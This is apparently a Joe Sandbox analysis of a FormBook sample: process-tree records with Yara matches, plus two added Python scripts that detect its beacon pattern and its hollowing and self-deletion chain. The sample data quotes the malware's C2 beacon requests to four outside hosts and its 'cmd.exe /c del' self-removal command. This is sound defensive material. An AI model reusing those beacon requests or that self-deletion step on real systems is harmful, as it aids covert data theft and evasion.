                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
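
Across sessions 5 to 8 the injected explorer.exe sends the same request shape to four unrelated hosts: GET /iu4d/ with a long base64-like AR6 value, the identical second parameter nflLiT=xPJxAxbPf, a Host header, Connection: close and no User-Agent. The responses (two 404s, a 301 to HTTPS, a 403) show that the hosts themselves do not serve the path; it is the request shape repeated across hosts, not any response, that identifies the beacon. The script below is an added example and not part of this Joe Sandbox report: it groups captured requests by path and ordered query keys, reports shapes that recur across several hosts together with query parameters whose value never changes, and lists the weak per-request signals (no User-Agent, non-browser process, Connection: close, base64-like value). The four explorer.exe records reproduce the request lines and headers captured above; the two Firefox records are constructed for contrast; the thresholds min_hosts=3 and a 40-character base64 minimum are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample input. The four explorer.exe requests reproduce the request
# lines and headers captured in the sessions above; the two browser requests at the
# end are invented for contrast and are not from the report.
SAMPLE_REQUESTS = [
    ("C:\\Windows\\explorer.exe",
     "GET /iu4d/?AR6=aMD/FfTIFdO3dQr6MUn+t3qhrpMUQuV8ueOBsAqsCPdFlO5Mvx0OM51UzrA3L99pwBOY&nflLiT=xPJxAxbPf HTTP/1.1\r\n"
     "Host: www.okitmall.com\r\nConnection: close\r\n\r\n"),
    ("C:\\Windows\\explorer.exe",
     "GET /iu4d/?AR6=y4JxQtggtXVUGlOHrdhsWpYE5Q5QdQRqM5s9avj6g1ZOxqioacxcZohZ3CHAJSRBFHfe&nflLiT=xPJxAxbPf HTTP/1.1\r\n"
     "Host: www.cqsjny.com\r\nConnection: close\r\n\r\n"),
    ("C:\\Windows\\explorer.exe",
     "GET /iu4d/?AR6=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbT09VD1VuWTt&nflLiT=xPJxAxbPf HTTP/1.1\r\n"
     "Host: www.betbonusuk.com\r\nConnection: close\r\n\r\n"),
    ("C:\\Windows\\explorer.exe",
     "GET /iu4d/?AR6=a4TwvNFJUHZfYjxmJDGfKucvC3Kvi9GvZt2BYG7bsK78eAq1dsPAQngdGmiuB14d735P&nflLiT=xPJxAxbPf HTTP/1.1\r\n"
     "Host: www.yashaerotech.com\r\nConnection: close\r\n\r\n"),
    ("C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "GET /news/?page=2 HTTP/1.1\r\nHost: www.example.org\r\n"
     "User-Agent: Mozilla/5.0\r\nAccept: text/html\r\nConnection: keep-alive\r\n\r\n"),
    ("C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "GET /search?q=formbook HTTP/1.1\r\nHost: www.example.net\r\n"
     "User-Agent: Mozilla/5.0\r\nAccept: text/html\r\nConnection: keep-alive\r\n\r\n"),
]

BROWSERS = ("chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe")
# Assumed threshold: a single query value of 40+ base64 characters.
BASE64ISH = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")


def parse_request(raw):
    """Split an HTTP/1.1 request into method, path, raw query pairs and headers.

    The query is split by hand rather than with parse_qsl so '+' and '/' inside
    base64-like values survive untouched."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target = lines[0].split(" ")[:2]
    path, _, query = target.partition("?")
    params = [tuple(chunk.partition("=")[::2]) for chunk in query.split("&") if chunk]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "params": params,
            "headers": headers, "host": headers.get("host", "")}


def request_indicators(process, req):
    """Per-request signals; each is weak alone, together they describe the beacon above."""
    reasons = []
    if "user-agent" not in req["headers"]:
        reasons.append("no User-Agent header")
    if not process.lower().endswith(BROWSERS):
        reasons.append("HTTP from non-browser process " + process.rsplit("\\", 1)[-1])
    if req["headers"].get("connection", "").lower() == "close":
        reasons.append("Connection: close on a one-shot GET")
    if any(BASE64ISH.match(value) for _, value in req["params"]):
        reasons.append("long base64-like query value")
    return reasons


def beacon_clusters(records, min_hosts=3):
    """Group requests by (path, ordered query keys). A shape that recurs across
    several unrelated hosts is the domain rotation visible in the sessions above."""
    by_shape = defaultdict(list)
    for process, raw in records:
        req = parse_request(raw)
        shape = (req["path"], tuple(key for key, _ in req["params"]))
        by_shape[shape].append((process, req))
    clusters = []
    for (path, keys), hits in by_shape.items():
        hosts = sorted({req["host"] for _, req in hits})
        if len(hosts) < min_hosts:
            continue
        # A query parameter whose value never changes across hosts is a campaign constant
        # worth pivoting on (here nflLiT=xPJxAxbPf).
        constant = {}
        for key in keys:
            values = {dict(req["params"])[key] for _, req in hits}
            if len(values) == 1:
                constant[key] = values.pop()
        reasons = sorted({r for process, req in hits for r in request_indicators(process, req)})
        clusters.append({"path": path, "keys": keys, "hosts": hosts,
                         "constant_params": constant, "indicators": reasons})
    return clusters


if __name__ == "__main__":
    for cluster in beacon_clusters(SAMPLE_REQUESTS):
        print(cluster["path"], cluster["hosts"], cluster["constant_params"], cluster["indicators"])
```

Run it as-is to see the single /iu4d/ cluster with its four hosts, the constant nflLiT value and the four indicators; feed it proxy or PCAP-derived request records in the same (process, raw request) form to triage a real capture. The process column is what separates this from a plain web-proxy rule: the same GET from a browser would only raise the base64 signal.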


                                                              Behavior

                                                              System Behavior

                                                              General

                                                              Start time:11:03:54
                                                              Start date:08/04/2021
                                                              Path:C:\Users\user\Desktop\hvEop8Y70Y.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Users\user\Desktop\hvEop8Y70Y.exe'
                                                              Imagebase:0x8b0000
                                                              File size:652800 bytes
                                                              MD5 hash:BD7E988ED1D92F9FAF32F6A817D89329
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.262152823.0000000003FD3000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.262152823.0000000003FD3000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.262152823.0000000003FD3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmp, Author: Joe Security
                                                              Reputation:low

                                                              General

                                                              Start time:11:04:05
                                                              Start date:08/04/2021
                                                              Path:C:\Users\user\Desktop\hvEop8Y70Y.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Users\user\Desktop\hvEop8Y70Y.exe
                                                              Imagebase:0x9a0000
                                                              File size:652800 bytes
                                                              MD5 hash:BD7E988ED1D92F9FAF32F6A817D89329
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.311261604.00000000011B0000.00000040.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.311261604.00000000011B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.311261604.00000000011B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.311590903.00000000011E0000.00000040.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.311590903.00000000011E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.311590903.00000000011E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.310331740.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.310331740.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.310331740.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              Reputation:low

                                                              General

                                                              Start time:11:04:08
                                                              Start date:08/04/2021
                                                              Path:C:\Windows\explorer.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:
                                                              Imagebase:0x7ff693d90000
                                                              File size:3933184 bytes
                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:11:04:24
                                                              Start date:08/04/2021
                                                              Path:C:\Windows\SysWOW64\raserver.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\SysWOW64\raserver.exe
                                                              Imagebase:0xcb0000
                                                              File size:108544 bytes
                                                              MD5 hash:2AADF65E395BFBD0D9B71D7279C8B5EC
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.505716758.0000000000730000.00000040.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.505716758.0000000000730000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.505716758.0000000000730000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.504377982.0000000000380000.00000040.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.504377982.0000000000380000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.504377982.0000000000380000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.507153893.0000000000C80000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.507153893.0000000000C80000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.507153893.0000000000C80000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              Reputation:moderate

                                                              General

                                                              Start time:11:04:31
                                                              Start date:08/04/2021
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:/c del 'C:\Users\user\Desktop\hvEop8Y70Y.exe'
                                                              Imagebase:0x10a0000
                                                              File size:232960 bytes
                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:11:04:31
                                                              Start date:08/04/2021
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7ecfc0000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
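
The process list above reads as a chain: the .NET hvEop8Y70Y.exe (11:03:54) starts a second copy of itself (11:04:05) that the report classifies as native code and that already carries FormBook in memory; explorer.exe (11:04:08) then appears in the tree, followed by the 32-bit C:\Windows\SysWOW64\raserver.exe (11:04:24) with the same FormBook Yara hits, and finally cmd.exe /c del removing the original sample (11:04:31). The script below is an added example, not part of this report, that pulls those three links out of Sysmon-style process-creation events: a process whose parent has the same image, explorer.exe launching a SysWOW64 binary with no arguments, and cmd.exe deleting the image of a process already seen. Image paths, command lines and start times are taken from the report; the PIDs and the parent links are assumptions, since this section of the report does not show them.

```python
import ntpath
import re

# Constructed event list modelled on the process section above. Image paths, command
# lines and start times come from the report; the PIDs and parent links are assumed.
EVENTS = [
    {"pid": 100, "ppid": 1, "time": "11:03:54",
     "image": r"C:\Users\user\Desktop\hvEop8Y70Y.exe",
     "cmdline": r"'C:\Users\user\Desktop\hvEop8Y70Y.exe'"},
    {"pid": 101, "ppid": 100, "time": "11:04:05",
     "image": r"C:\Users\user\Desktop\hvEop8Y70Y.exe",
     "cmdline": r"C:\Users\user\Desktop\hvEop8Y70Y.exe"},
    {"pid": 200, "ppid": 1, "time": "11:04:08",
     "image": r"C:\Windows\explorer.exe", "cmdline": ""},
    {"pid": 201, "ppid": 200, "time": "11:04:24",
     "image": r"C:\Windows\SysWOW64\raserver.exe",
     "cmdline": r"C:\Windows\SysWOW64\raserver.exe"},
    {"pid": 202, "ppid": 201, "time": "11:04:31",
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"/c del 'C:\Users\user\Desktop\hvEop8Y70Y.exe'"},
    {"pid": 203, "ppid": 202, "time": "11:04:31",
     "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

SYSWOW64 = "c:\\windows\\syswow64\\"
# cmd.exe /c del <path>, with or without quotes around the path.
DEL_RE = re.compile(r"""/c\s+del\s+['"]?([^'"]+?)['"]?\s*$""", re.IGNORECASE)


def triage_process_events(events):
    """Return (pid, finding) pairs for the three links of the chain described above."""
    by_pid = {e["pid"]: e for e in events}
    images_seen = {e["image"].lower() for e in events}
    findings = []
    for e in events:
        image = e["image"].lower()
        name = ntpath.basename(image)
        parent = by_pid.get(e["ppid"])
        parent_name = ntpath.basename(parent["image"]).lower() if parent else ""
        # 1. A process starting a second instance of its own image: the usual prelude to
        #    hollowing the child and replacing its code with the unpacked payload.
        if parent and parent["image"].lower() == image:
            findings.append((e["pid"], "self-spawn of %s by its parent" % name))
        # 2. explorer.exe launching a 32-bit system binary with no arguments: the shell
        #    does not normally start SysWOW64 tools bare, an injected explorer does.
        if parent_name == "explorer.exe" and image.startswith(SYSWOW64) \
                and e["cmdline"].strip().strip('"').lower() in ("", image):
            findings.append((e["pid"], "explorer.exe started %s with no arguments" % name))
        # 3. cmd.exe deleting a file that is the image of a process already seen:
        #    the dropper cleaning itself up once the payload runs elsewhere.
        if name == "cmd.exe":
            m = DEL_RE.search(e["cmdline"])
            if m and m.group(1).lower() in images_seen:
                findings.append((e["pid"], "cmd.exe deleted the image of an earlier process: " + m.group(1)))
    return findings


def lineage(events, pid):
    """Image basenames from the root of the visible tree down to pid."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(ntpath.basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


if __name__ == "__main__":
    for pid, finding in triage_process_events(EVENTS):
        print(pid, " > ".join(lineage(EVENTS, pid)), "::", finding)
```

Rule 3 is the one that needs the whole event set: a lone "cmd.exe /c del" is unremarkable, but deleting a path that was the image of a process seen minutes earlier is the self-removal in the report. On real Sysmon data the same three checks apply to Event ID 1 records once the Image, ParentImage, CommandLine and ProcessId fields are mapped to the keys used here.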
